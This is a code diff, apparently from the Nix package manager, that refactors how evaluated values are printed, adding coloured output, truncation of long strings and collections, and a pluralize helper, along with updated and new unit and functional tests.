+ namespace nix { -std::ostream & -printLiteralString(std::ostream & str, const std::string_view string) +void printElided( + std::ostream & output, + unsigned int value, + const std::string_view single, + const std::string_view plural, + bool ansiColors) { + if (ansiColors) + output << ANSI_FAINT; + output << " «"; + pluralize(output, value, single, plural); + output << " elided»"; + if (ansiColors) + output << ANSI_NORMAL; +} + + +std::ostream & +printLiteralString(std::ostream & str, const std::string_view string, size_t maxLength, bool ansiColors) +{ + size_t charsPrinted = 0; + if (ansiColors) + str << ANSI_MAGENTA; str << "\""; for (auto i = string.begin(); i != string.end(); ++i) { + if (charsPrinted >= maxLength) { + str << "\""; + printElided(str, string.length() - charsPrinted, "byte", "bytes", ansiColors); + return str; + } + if (*i == '\"' || *i == '\\') str << "\\" << *i; else if (*i == '\n') str << "\\n"; else if (*i == '\r') str << "\\r"; else if (*i == '\t') str << "\\t"; else if (*i == '$' && *(i+1) == '{') str << "\\" << *i; else str << *i; + charsPrinted++; } str << "\""; + if (ansiColors) + str << ANSI_NORMAL; return str; } +std::ostream & +printLiteralString(std::ostream & str, const std::string_view string) +{ + return printLiteralString(str, string, std::numeric_limits::max(), false); +} + std::ostream & printLiteralBool(std::ostream & str, bool boolean) { @@ -90,5 +132,373 @@ printAttributeName(std::ostream & str, std::string_view name) { return str; } +bool isImportantAttrName(const std::string& attrName) +{ + return attrName == "type" || attrName == "_type"; +} + +typedef std::pair AttrPair; + +struct ImportantFirstAttrNameCmp +{ + + bool operator()(const AttrPair& lhs, const AttrPair& rhs) const + { + auto lhsIsImportant = isImportantAttrName(lhs.first); + auto rhsIsImportant = isImportantAttrName(rhs.first); + return std::forward_as_tuple(!lhsIsImportant, lhs.first) + < std::forward_as_tuple(!rhsIsImportant, rhs.first); + } +}; + +typedef std::set ValuesSeen; + +class Printer +{ +private: + std::ostream & output; + EvalState & state; + PrintOptions options; + std::optional seen; + + void printRepeated() + { + if (options.ansiColors) + output << ANSI_MAGENTA; + output << "«repeated»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printNullptr() + { + if (options.ansiColors) + output << ANSI_MAGENTA; + output << "«nullptr»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printElided(unsigned int value, const std::string_view single, const std::string_view plural) + { + ::nix::printElided(output, value, single, plural, options.ansiColors); + } + + void printInt(Value & v) + { + if (options.ansiColors) + output << ANSI_CYAN; + output << v.integer; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printFloat(Value & v) + { + if (options.ansiColors) + output << ANSI_CYAN; + output << v.fpoint; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printBool(Value & v) + { + if (options.ansiColors) + output << ANSI_CYAN; + printLiteralBool(output, v.boolean); + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printString(Value & v) + { + printLiteralString(output, v.string_view(), options.maxStringLength, options.ansiColors); + } + + void printPath(Value & v) + { + if (options.ansiColors) + output << ANSI_GREEN; + output << v.path().to_string(); // !!! escaping? + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printNull() + { + if (options.ansiColors) + output << ANSI_CYAN; + output << "null"; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printDerivation(Value & v) + { + try { + Bindings::iterator i = v.attrs->find(state.sDrvPath); + NixStringContext context; + std::string storePath; + if (i != v.attrs->end()) + storePath = state.store->printStorePath(state.coerceToStorePath(i->pos, *i->value, context, "while evaluating the drvPath of a derivation")); + + if (options.ansiColors) + output << ANSI_GREEN; + output << "«derivation"; + if (!storePath.empty()) { + output << " " << storePath; + } + output << "»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } catch (BaseError & e) { + printError_(e); + } + } + + void printAttrs(Value & v, size_t depth) + { + if (seen && !seen->insert(&v).second) { + printRepeated(); + return; + } + + if (options.force && options.derivationPaths && state.isDerivation(v)) { + printDerivation(v); + } else if (depth < options.maxDepth) { + output << "{ "; + + std::vector> sorted; + for (auto & i : *v.attrs) + sorted.emplace_back(std::pair(state.symbols[i.name], i.value)); + + if (options.maxAttrs == std::numeric_limits::max()) + std::sort(sorted.begin(), sorted.end()); + else + std::sort(sorted.begin(), sorted.end(), ImportantFirstAttrNameCmp()); + + size_t attrsPrinted = 0; + for (auto & i : sorted) { + if (attrsPrinted >= options.maxAttrs) { + printElided(sorted.size() - attrsPrinted, "attribute", "attributes"); + break; + } + + printAttributeName(output, i.first); + output << " = "; + print(*i.second, depth + 1); + output << "; "; + attrsPrinted++; + } + + output << "}"; + } else + output << "{ ... }"; + } + + void printList(Value & v, size_t depth) + { + if (seen && v.listSize() && !seen->insert(&v).second) { + printRepeated(); + return; + } + + output << "[ "; + if (depth < options.maxDepth) { + size_t listItemsPrinted = 0; + for (auto elem : v.listItems()) { + if (listItemsPrinted >= options.maxListItems) { + printElided(v.listSize() - listItemsPrinted, "item", "items"); + break; + } + + if (elem) { + print(*elem, depth + 1); + } else { + printNullptr(); + } + output << " "; + listItemsPrinted++; + } + } + else + output << "... "; + output << "]"; + } + + void printFunction(Value & v) + { + if (options.ansiColors) + output << ANSI_BLUE; + output << "«"; + + if (v.isLambda()) { + output << "lambda"; + if (v.lambda.fun) { + if (v.lambda.fun->name) { + output << " " << state.symbols[v.lambda.fun->name]; + } + + std::ostringstream s; + s << state.positions[v.lambda.fun->pos]; + output << " @ " << filterANSIEscapes(s.str()); + } + } else if (v.isPrimOp()) { + if (v.primOp) + output << *v.primOp; + else + output << "primop"; + } else if (v.isPrimOpApp()) { + output << "partially applied "; + auto primOp = v.primOpAppPrimOp(); + if (primOp) + output << *primOp; + else + output << "primop"; + } else { + abort(); + } + + output << "»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printThunk(Value & v) + { + if (v.isBlackhole()) { + // Although we know for sure that it's going to be an infinite recursion + // when this value is accessed _in the current context_, it's likely + // that the user will misinterpret a simpler «infinite recursion» output + // as a definitive statement about the value, while in fact it may be + // a valid value after `builtins.trace` and perhaps some other steps + // have completed. + if (options.ansiColors) + output << ANSI_RED; + output << "«potential infinite recursion»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } else if (v.isThunk() || v.isApp()) { + if (options.ansiColors) + output << ANSI_MAGENTA; + output << "«thunk»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } else { + abort(); + } + } + + void printExternal(Value & v) + { + v.external->print(output); + } + + void printUnknown() + { + if (options.ansiColors) + output << ANSI_RED; + output << "«unknown»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void printError_(BaseError & e) + { + if (options.ansiColors) + output << ANSI_RED; + output << "«" << e.msg() << "»"; + if (options.ansiColors) + output << ANSI_NORMAL; + } + + void print(Value & v, size_t depth) + { + output.flush(); + checkInterrupt(); + + if (options.force) { + try { + state.forceValue(v, v.determinePos(noPos)); + } catch (BaseError & e) { + printError_(e); + return; + } + } + + switch (v.type()) { + + case nInt: + printInt(v); + break; + + case nFloat: + printFloat(v); + break; + + case nBool: + printBool(v); + break; + + case nString: + printString(v); + break; + + case nPath: + printPath(v); + break; + + case nNull: + printNull(); + break; + + case nAttrs: + printAttrs(v, depth); + break; + + case nList: + printList(v, depth); + break; + + case nFunction: + printFunction(v); + break; + + case nThunk: + printThunk(v); + break; + + case nExternal: + printExternal(v); + break; + + default: + printUnknown(); + break; + } + } + +public: + Printer(std::ostream & output, EvalState & state, PrintOptions options) + : output(output), state(state), options(options) { } + + void print(Value & v) + { + if (options.trackRepeated) { + seen.emplace(); + } else { + seen.reset(); + } + + ValuesSeen seen; + print(v, 0); + } +}; + +void printValue(EvalState & state, std::ostream & output, Value & v, PrintOptions options) +{ + Printer(output, state, options).print(v); +} } diff --git a/src/libexpr/print.hh b/src/libexpr/print.hh index abf830864..40207d777 100644 --- a/src/libexpr/print.hh +++ b/src/libexpr/print.hh @@ -9,6 +9,9 @@ #include +#include "eval.hh" +#include "print-options.hh" + namespace nix { /** @@ -16,6 +19,7 @@ namespace nix { * * Quotes and fairly minimal escaping are added. * + * @param o The output stream to print to * @param s The logical string */ std::ostream & printLiteralString(std::ostream & o, std::string_view s); @@ -53,4 +57,6 @@ bool isReservedKeyword(const std::string_view str); */ std::ostream & printIdentifier(std::ostream & o, std::string_view s); +void printValue(EvalState & state, std::ostream & str, Value & v, PrintOptions options = PrintOptions {}); + } diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh index c65b336b0..214d52271 100644 --- a/src/libexpr/value.hh +++ b/src/libexpr/value.hh @@ -9,6 +9,7 @@ #include "value/context.hh" #include "input-accessor.hh" #include "source-path.hh" +#include "print-options.hh" #if HAVE_BOEHMGC #include @@ -70,7 +71,7 @@ struct Pos; class StorePath; class EvalState; class XMLWriter; - +class Printer; typedef int64_t NixInt; typedef double NixFloat; @@ -82,6 +83,7 @@ typedef double NixFloat; class ExternalValueBase { friend std::ostream & operator << (std::ostream & str, const ExternalValueBase & v); + friend class Printer; protected: /** * Print out the value @@ -139,11 +141,9 @@ private: friend std::string showType(const Value & v); - void print(const SymbolTable &symbols, std::ostream &str, std::set *seen, int depth) const; - public: - void print(const SymbolTable &symbols, std::ostream &str, bool showRepeated = false, int depth = INT_MAX) const; + void print(EvalState &state, std::ostream &str, PrintOptions options = PrintOptions {}); // Functions needed to distinguish the type // These should be removed eventually, by putting the functionality that's @@ -364,10 +364,15 @@ public: inline void mkPrimOpApp(Value * l, Value * r) { internalType = tPrimOpApp; - app.left = l; - app.right = r; + primOpApp.left = l; + primOpApp.right = r; } + /** + * For a `tPrimOpApp` value, get the original `PrimOp` value. + */ + PrimOp * primOpAppPrimOp() const; + inline void mkExternal(ExternalValueBase * e) { clearValue(); diff --git a/src/libutil/english.cc b/src/libutil/english.cc new file mode 100644 index 000000000..8c93c9156 --- /dev/null +++ b/src/libutil/english.cc @@ -0,0 +1,18 @@ +#include "english.hh" + +namespace nix { + +std::ostream & pluralize( + std::ostream & output, + unsigned int count, + const std::string_view single, + const std::string_view plural) +{ + if (count == 1) + output << "1 " << single; + else + output << count << " " << plural; + return output; +} + +} diff --git a/src/libutil/english.hh b/src/libutil/english.hh new file mode 100644 index 000000000..9c6c93571 --- /dev/null +++ b/src/libutil/english.hh @@ -0,0 +1,18 @@ +#pragma once + +#include + +namespace nix { + +/** + * Pluralize a given value. + * + * If `count == 1`, prints `1 {single}` to `output`, otherwise prints `{count} {plural}`. + */ +std::ostream & pluralize( + std::ostream & output, + unsigned int count, + const std::string_view single, + const std::string_view plural); + +} diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc index 9f4d063d2..3d07cab7a 100644 --- a/src/nix-env/user-env.cc +++ b/src/nix-env/user-env.cc @@ -8,6 +8,8 @@ #include "eval.hh" #include "eval-inline.hh" #include "profiles.hh" +#include "print-ambiguous.hh" +#include namespace nix { @@ -106,7 +108,8 @@ bool createUserEnv(EvalState & state, DrvInfos & elems, environment. */ auto manifestFile = ({ std::ostringstream str; - manifest.print(state.symbols, str, true); + std::set seen; + printAmbiguous(manifest, state.symbols, str, &seen, std::numeric_limits::max()); // TODO with C++20 we can use str.view() instead and avoid copy. std::string str2 = str.str(); StringSource source { str2 }; diff --git a/src/nix-instantiate/nix-instantiate.cc b/src/nix-instantiate/nix-instantiate.cc index ab590b3a6..9b36dccc6 100644 --- a/src/nix-instantiate/nix-instantiate.cc +++ b/src/nix-instantiate/nix-instantiate.cc @@ -56,7 +56,7 @@ void processExpr(EvalState & state, const Strings & attrPaths, std::cout << std::endl; } else { if (strict) state.forceValueDeep(vRes); - vRes.print(state.symbols, std::cout); + vRes.print(state, std::cout); std::cout << std::endl; } } else { diff --git a/tests/functional/lang/eval-okay-print.err.exp b/tests/functional/lang/eval-okay-print.err.exp index 3fc99be3e..80aa17c6e 100644 --- a/tests/functional/lang/eval-okay-print.err.exp +++ b/tests/functional/lang/eval-okay-print.err.exp @@ -1 +1 @@ -trace: [ ] +trace: [ «thunk» ] diff --git a/tests/functional/lang/eval-okay-print.exp b/tests/functional/lang/eval-okay-print.exp index 0d960fb70..aa1b2379e 100644 --- a/tests/functional/lang/eval-okay-print.exp +++ b/tests/functional/lang/eval-okay-print.exp @@ -1 +1 @@ -[ null [ [ «repeated» ] ] ] +[ null «primop toString» «partially applied primop deepSeq» «lambda @ /pwd/lang/eval-okay-print.nix:1:61» [ [ «repeated» ] ] ] diff --git a/tests/functional/lang/eval-okay-repeated-empty-attrs.exp b/tests/functional/lang/eval-okay-repeated-empty-attrs.exp new file mode 100644 index 000000000..d21e6db6b --- /dev/null +++ b/tests/functional/lang/eval-okay-repeated-empty-attrs.exp @@ -0,0 +1 @@ +[ { } { } ] diff --git a/tests/functional/lang/eval-okay-repeated-empty-attrs.nix b/tests/functional/lang/eval-okay-repeated-empty-attrs.nix new file mode 100644 index 000000000..030a3b85c --- /dev/null +++ b/tests/functional/lang/eval-okay-repeated-empty-attrs.nix @@ -0,0 +1,2 @@ +# Tests that empty attribute sets are not printed as `«repeated»`. +[ {} {} ] diff --git a/tests/functional/lang/eval-okay-repeated-empty-list.exp b/tests/functional/lang/eval-okay-repeated-empty-list.exp new file mode 100644 index 000000000..701fc7e20 --- /dev/null +++ b/tests/functional/lang/eval-okay-repeated-empty-list.exp @@ -0,0 +1 @@ +[ [ ] [ ] ] diff --git a/tests/functional/lang/eval-okay-repeated-empty-list.nix b/tests/functional/lang/eval-okay-repeated-empty-list.nix new file mode 100644 index 000000000..376c51be8 --- /dev/null +++ b/tests/functional/lang/eval-okay-repeated-empty-list.nix @@ -0,0 +1 @@ +[ [] [] ] diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc index a4f6fc014..98131112e 100644 --- a/tests/unit/libexpr/value/print.cc +++ b/tests/unit/libexpr/value/print.cc @@ -1,6 +1,7 @@ #include "tests/libexpr.hh" #include "value.hh" +#include "print.hh" namespace nix { @@ -12,7 +13,7 @@ struct ValuePrintingTests : LibExprTest void test(Value v, std::string_view expected, A... args) { std::stringstream out; - v.print(state.symbols, out, args...); + v.print(state, out, args...); ASSERT_EQ(out.str(), expected); } }; @@ -84,7 +85,7 @@ TEST_F(ValuePrintingTests, tList) vList.bigList.elems[1] = &vTwo; vList.bigList.size = 3; - test(vList, "[ 1 2 (nullptr) ]"); + test(vList, "[ 1 2 «nullptr» ]"); } TEST_F(ValuePrintingTests, vThunk) @@ -92,7 +93,7 @@ TEST_F(ValuePrintingTests, vThunk) Value vThunk; vThunk.mkThunk(nullptr, nullptr); - test(vThunk, ""); + test(vThunk, "«thunk»"); } TEST_F(ValuePrintingTests, vApp) @@ -100,32 +101,55 @@ TEST_F(ValuePrintingTests, vApp) Value vApp; vApp.mkApp(nullptr, nullptr); - test(vApp, ""); + test(vApp, "«thunk»"); } TEST_F(ValuePrintingTests, vLambda) { - Value vLambda; - vLambda.mkLambda(nullptr, nullptr); + Env env { + .up = nullptr, + .values = { } + }; + PosTable::Origin origin((std::monostate())); + auto posIdx = state.positions.add(origin, 1, 1); + auto body = ExprInt(0); + auto formals = Formals {}; - test(vLambda, ""); + ExprLambda eLambda(posIdx, createSymbol("a"), &formals, &body); + + Value vLambda; + vLambda.mkLambda(&env, &eLambda); + + test(vLambda, "«lambda @ «none»:1:1»"); + + eLambda.setName(createSymbol("puppy")); + + test(vLambda, "«lambda puppy @ «none»:1:1»"); } TEST_F(ValuePrintingTests, vPrimOp) { Value vPrimOp; - PrimOp primOp{}; + PrimOp primOp{ + .name = "puppy" + }; vPrimOp.mkPrimOp(&primOp); - test(vPrimOp, ""); + test(vPrimOp, "«primop puppy»"); } TEST_F(ValuePrintingTests, vPrimOpApp) { - Value vPrimOpApp; - vPrimOpApp.mkPrimOpApp(nullptr, nullptr); + PrimOp primOp{ + .name = "puppy" + }; + Value vPrimOp; + vPrimOp.mkPrimOp(&primOp); - test(vPrimOpApp, ""); + Value vPrimOpApp; + vPrimOpApp.mkPrimOpApp(&vPrimOp, nullptr); + + test(vPrimOpApp, "«partially applied primop puppy»"); } TEST_F(ValuePrintingTests, vExternal) @@ -176,9 +200,14 @@ TEST_F(ValuePrintingTests, depthAttrs) Value vTwo; vTwo.mkInt(2); + BindingsBuilder builderEmpty(state, state.allocBindings(0)); + Value vAttrsEmpty; + vAttrsEmpty.mkAttrs(builderEmpty.finish()); + BindingsBuilder builder(state, state.allocBindings(10)); builder.insert(state.symbols.create("one"), &vOne); builder.insert(state.symbols.create("two"), &vTwo); + builder.insert(state.symbols.create("nested"), &vAttrsEmpty); Value vAttrs; vAttrs.mkAttrs(builder.finish()); @@ -191,10 +220,10 @@ TEST_F(ValuePrintingTests, depthAttrs) Value vNested; vNested.mkAttrs(builder2.finish()); - test(vNested, "{ nested = «too deep»; one = «too deep»; two = «too deep»; }", false, 1); - test(vNested, "{ nested = { one = «too deep»; two = «too deep»; }; one = 1; two = 2; }", false, 2); - test(vNested, "{ nested = { one = 1; two = 2; }; one = 1; two = 2; }", false, 3); - test(vNested, "{ nested = { one = 1; two = 2; }; one = 1; two = 2; }", false, 4); + test(vNested, "{ nested = { ... }; one = 1; two = 2; }", PrintOptions { .maxDepth = 1 }); + test(vNested, "{ nested = { nested = { ... }; one = 1; two = 2; }; one = 1; two = 2; }", PrintOptions { .maxDepth = 2 }); + test(vNested, "{ nested = { nested = { }; one = 1; two = 2; }; one = 1; two = 2; }", PrintOptions { .maxDepth = 3 }); + test(vNested, "{ nested = { nested = { }; one = 1; two = 2; }; one = 1; two = 2; }", PrintOptions { .maxDepth = 4 }); } TEST_F(ValuePrintingTests, depthList) @@ -227,11 +256,561 @@ TEST_F(ValuePrintingTests, depthList) vList.bigList.elems[2] = &vNested; vList.bigList.size = 3; - test(vList, "[ «too deep» «too deep» «too deep» ]", false, 1); - test(vList, "[ 1 2 { nested = «too deep»; one = «too deep»; two = «too deep»; } ]", false, 2); - test(vList, "[ 1 2 { nested = { one = «too deep»; two = «too deep»; }; one = 1; two = 2; } ]", false, 3); - test(vList, "[ 1 2 { nested = { one = 1; two = 2; }; one = 1; two = 2; } ]", false, 4); - test(vList, "[ 1 2 { nested = { one = 1; two = 2; }; one = 1; two = 2; } ]", false, 5); + test(vList, "[ 1 2 { ... } ]", PrintOptions { .maxDepth = 1 }); + test(vList, "[ 1 2 { nested = { ... }; one = 1; two = 2; } ]", PrintOptions { .maxDepth = 2 }); + test(vList, "[ 1 2 { nested = { one = 1; two = 2; }; one = 1; two = 2; } ]", PrintOptions { .maxDepth = 3 }); + test(vList, "[ 1 2 { nested = { one = 1; two = 2; }; one = 1; two = 2; } ]", PrintOptions { .maxDepth = 4 }); + test(vList, "[ 1 2 { nested = { one = 1; two = 2; }; one = 1; two = 2; } ]", PrintOptions { .maxDepth = 5 }); +} + +struct StringPrintingTests : LibExprTest +{ + template + void test(std::string_view literal, std::string_view expected, unsigned int maxLength, A... args) + { + Value v; + v.mkString(literal); + + std::stringstream out; + printValue(state, out, v, PrintOptions { + .maxStringLength = maxLength + }); + ASSERT_EQ(out.str(), expected); + } +}; + +TEST_F(StringPrintingTests, maxLengthTruncation) +{ + test("abcdefghi", "\"abcdefghi\"", 10); + test("abcdefghij", "\"abcdefghij\"", 10); + test("abcdefghijk", "\"abcdefghij\" «1 byte elided»", 10); + test("abcdefghijkl", "\"abcdefghij\" «2 bytes elided»", 10); + test("abcdefghijklm", "\"abcdefghij\" «3 bytes elided»", 10); +} + +// Check that printing an attrset shows 'important' attributes like `type` +// first, but only reorder the attrs when we have a maxAttrs budget. +TEST_F(ValuePrintingTests, attrsTypeFirst) +{ + Value vType; + vType.mkString("puppy"); + + Value vApple; + vApple.mkString("apple"); + + BindingsBuilder builder(state, state.allocBindings(10)); + builder.insert(state.symbols.create("type"), &vType); + builder.insert(state.symbols.create("apple"), &vApple); + + Value vAttrs; + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + "{ type = \"puppy\"; apple = \"apple\"; }", + PrintOptions { + .maxAttrs = 100 + }); + + test(vAttrs, + "{ apple = \"apple\"; type = \"puppy\"; }", + PrintOptions { }); +} + +TEST_F(ValuePrintingTests, ansiColorsInt) +{ + Value v; + v.mkInt(10); + + test(v, + ANSI_CYAN "10" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsFloat) +{ + Value v; + v.mkFloat(1.6); + + test(v, + ANSI_CYAN "1.6" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsBool) +{ + Value v; + v.mkBool(true); + + test(v, + ANSI_CYAN "true" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsString) +{ + Value v; + v.mkString("puppy"); + + test(v, + ANSI_MAGENTA "\"puppy\"" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsStringElided) +{ + Value v; + v.mkString("puppy"); + + test(v, + ANSI_MAGENTA "\"pup\"" ANSI_FAINT " «2 bytes elided»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .maxStringLength = 3 + }); +} + +TEST_F(ValuePrintingTests, ansiColorsPath) +{ + Value v; + v.mkPath(state.rootPath(CanonPath("puppy"))); + + test(v, + ANSI_GREEN "/puppy" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsNull) +{ + Value v; + v.mkNull(); + + test(v, + ANSI_CYAN "null" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsAttrs) +{ + Value vOne; + vOne.mkInt(1); + + Value vTwo; + vTwo.mkInt(2); + + BindingsBuilder builder(state, state.allocBindings(10)); + builder.insert(state.symbols.create("one"), &vOne); + builder.insert(state.symbols.create("two"), &vTwo); + + Value vAttrs; + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; two = " ANSI_CYAN "2" ANSI_NORMAL "; }", + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsDerivation) +{ + Value vDerivation; + vDerivation.mkString("derivation"); + + BindingsBuilder builder(state, state.allocBindings(10)); + builder.insert(state.sType, &vDerivation); + + Value vAttrs; + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + ANSI_GREEN "«derivation»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .force = true, + .derivationPaths = true + }); + + test(vAttrs, + "{ type = " ANSI_MAGENTA "\"derivation\"" ANSI_NORMAL "; }", + PrintOptions { + .ansiColors = true, + .force = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsError) +{ + Value throw_ = state.getBuiltin("throw"); + Value message; + message.mkString("uh oh!"); + Value vError; + vError.mkApp(&throw_, &message); + + test(vError, + ANSI_RED + "«" + ANSI_RED + "error:" + ANSI_NORMAL + "\n … while calling the '" + ANSI_MAGENTA + "throw" + ANSI_NORMAL + "' builtin\n\n " + ANSI_RED + "error:" + ANSI_NORMAL + " uh oh!»" + ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .force = true, + }); +} + +TEST_F(ValuePrintingTests, ansiColorsDerivationError) +{ + Value throw_ = state.getBuiltin("throw"); + Value message; + message.mkString("uh oh!"); + Value vError; + vError.mkApp(&throw_, &message); + + Value vDerivation; + vDerivation.mkString("derivation"); + + BindingsBuilder builder(state, state.allocBindings(10)); + builder.insert(state.sType, &vDerivation); + builder.insert(state.sDrvPath, &vError); + + Value vAttrs; + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + "{ drvPath = " + ANSI_RED + "«" + ANSI_RED + "error:" + ANSI_NORMAL + "\n … while calling the '" + ANSI_MAGENTA + "throw" + ANSI_NORMAL + "' builtin\n\n " + ANSI_RED + "error:" + ANSI_NORMAL + " uh oh!»" + ANSI_NORMAL + "; type = " + ANSI_MAGENTA + "\"derivation\"" + ANSI_NORMAL + "; }", + PrintOptions { + .ansiColors = true, + .force = true + }); + + test(vAttrs, + ANSI_RED + "«" + ANSI_RED + "error:" + ANSI_NORMAL + "\n … while calling the '" + ANSI_MAGENTA + "throw" + ANSI_NORMAL + "' builtin\n\n " + ANSI_RED + "error:" + ANSI_NORMAL + " uh oh!»" + ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .force = true, + .derivationPaths = true, + }); +} + +TEST_F(ValuePrintingTests, ansiColorsAssert) +{ + ExprVar eFalse(state.symbols.create("false")); + eFalse.bindVars(state, state.staticBaseEnv); + ExprInt eInt(1); + + ExprAssert expr(noPos, &eFalse, &eInt); + + Value v; + state.mkThunk_(v, &expr); + + test(v, + ANSI_RED "«" ANSI_RED "error:" ANSI_NORMAL " assertion '" ANSI_MAGENTA "false" ANSI_NORMAL "' failed»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .force = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsList) +{ + Value vOne; + vOne.mkInt(1); + + Value vTwo; + vTwo.mkInt(2); + + Value vList; + state.mkList(vList, 5); + vList.bigList.elems[0] = &vOne; + vList.bigList.elems[1] = &vTwo; + vList.bigList.size = 3; + + test(vList, + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_CYAN "2" ANSI_NORMAL " " ANSI_MAGENTA "«nullptr»" ANSI_NORMAL " ]", + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsLambda) +{ + Env env { + .up = nullptr, + .values = { } + }; + PosTable::Origin origin((std::monostate())); + auto posIdx = state.positions.add(origin, 1, 1); + auto body = ExprInt(0); + auto formals = Formals {}; + + ExprLambda eLambda(posIdx, createSymbol("a"), &formals, &body); + + Value vLambda; + vLambda.mkLambda(&env, &eLambda); + + test(vLambda, + ANSI_BLUE "«lambda @ «none»:1:1»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .force = true + }); + + eLambda.setName(createSymbol("puppy")); + + test(vLambda, + ANSI_BLUE "«lambda puppy @ «none»:1:1»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true, + .force = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsPrimOp) +{ + PrimOp primOp{ + .name = "puppy" + }; + Value v; + v.mkPrimOp(&primOp); + + test(v, + ANSI_BLUE "«primop puppy»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsPrimOpApp) +{ + PrimOp primOp{ + .name = "puppy" + }; + Value vPrimOp; + vPrimOp.mkPrimOp(&primOp); + + Value v; + v.mkPrimOpApp(&vPrimOp, nullptr); + + test(v, + ANSI_BLUE "«partially applied primop puppy»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsThunk) +{ + Value v; + v.mkThunk(nullptr, nullptr); + + test(v, + ANSI_MAGENTA "«thunk»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsBlackhole) +{ + Value v; + v.mkBlackhole(); + + test(v, + ANSI_RED "«potential infinite recursion»" ANSI_NORMAL, + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsAttrsRepeated) +{ + BindingsBuilder emptyBuilder(state, state.allocBindings(1)); + + Value vEmpty; + vEmpty.mkAttrs(emptyBuilder.finish()); + + BindingsBuilder builder(state, state.allocBindings(10)); + builder.insert(state.symbols.create("a"), &vEmpty); + builder.insert(state.symbols.create("b"), &vEmpty); + + Value vAttrs; + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + "{ a = { }; b = " ANSI_MAGENTA "«repeated»" ANSI_NORMAL "; }", + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, ansiColorsListRepeated) +{ + BindingsBuilder emptyBuilder(state, state.allocBindings(1)); + + Value vEmpty; + vEmpty.mkAttrs(emptyBuilder.finish()); + + Value vList; + state.mkList(vList, 3); + vList.bigList.elems[0] = &vEmpty; + vList.bigList.elems[1] = &vEmpty; + vList.bigList.size = 2; + + test(vList, + "[ { } " ANSI_MAGENTA "«repeated»" ANSI_NORMAL " ]", + PrintOptions { + .ansiColors = true + }); +} + +TEST_F(ValuePrintingTests, listRepeated) +{ + BindingsBuilder emptyBuilder(state, state.allocBindings(1)); + + Value vEmpty; + vEmpty.mkAttrs(emptyBuilder.finish()); + + Value vList; + state.mkList(vList, 3); + vList.bigList.elems[0] = &vEmpty; + vList.bigList.elems[1] = &vEmpty; + vList.bigList.size = 2; + + test(vList, "[ { } «repeated» ]", PrintOptions { }); + test(vList, + "[ { } { } ]", + PrintOptions { + .trackRepeated = false + }); +} + +TEST_F(ValuePrintingTests, ansiColorsAttrsElided) +{ + Value vOne; + vOne.mkInt(1); + + Value vTwo; + vTwo.mkInt(2); + + BindingsBuilder builder(state, state.allocBindings(10)); + builder.insert(state.symbols.create("one"), &vOne); + builder.insert(state.symbols.create("two"), &vTwo); + + Value vAttrs; + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT " «1 attribute elided»" ANSI_NORMAL "}", + PrintOptions { + .ansiColors = true, + .maxAttrs = 1 + }); + + Value vThree; + vThree.mkInt(3); + + builder.insert(state.symbols.create("three"), &vThree); + vAttrs.mkAttrs(builder.finish()); + + test(vAttrs, + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT " «2 attributes elided»" ANSI_NORMAL "}", + PrintOptions { + .ansiColors = true, + .maxAttrs = 1 + }); +} + +TEST_F(ValuePrintingTests, ansiColorsListElided) +{ + BindingsBuilder emptyBuilder(state, state.allocBindings(1)); + + Value vOne; + vOne.mkInt(1); + + Value vTwo; + vTwo.mkInt(2); + + Value vList; + state.mkList(vList, 